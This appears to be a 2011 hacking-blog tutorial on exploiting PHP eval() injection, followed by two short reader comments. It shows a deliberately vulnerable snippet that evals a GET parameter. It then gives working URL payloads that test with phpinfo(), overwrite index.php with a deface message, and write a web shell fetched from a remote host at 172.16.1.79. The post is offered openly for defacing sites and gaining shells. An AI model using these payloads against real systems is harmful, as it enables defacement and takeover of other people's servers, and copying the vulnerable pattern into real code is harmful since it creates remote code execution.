Saturday, 5 March 2011

Deface using EVAL() function



"Eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
The problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such. Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result."

Ok, this is our the vuln page :

<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
?>
Now lets go to the interesting part, to start we need to test if the page is vuln typing this :
http://mytargettest.com/hacktest/index.php?ev=phpinfo();
If you can see the phpinfo webpage, it means we can exploit it.
Now lets see what we can do .
1) You can just deface the index.php using this URL -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("index.php",'w');fwrite($z,("Defaced by Hacker"));fclose($z);

2) Or you can create your shell with this URL -> http://mytargettest.com/hacktest/index.php?ev=$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://172.16.1.79/exploits/back.txt"));fclose($z);

3) Browse your shell : http://mytargetest.com/hacktest/shell.php
Now just look at my old posts (LFI or RFI) and you will know what to do from this point ;)

2 comments:

  1. Very nice tutorial.
    The question is how we know if the website parse variable that using eval() on the php script ??
    how to test the eval() vuln ??

    Thank you :)

    ReplyDelete
  2. By using a Web Vulnerability Scanner.

    ReplyDelete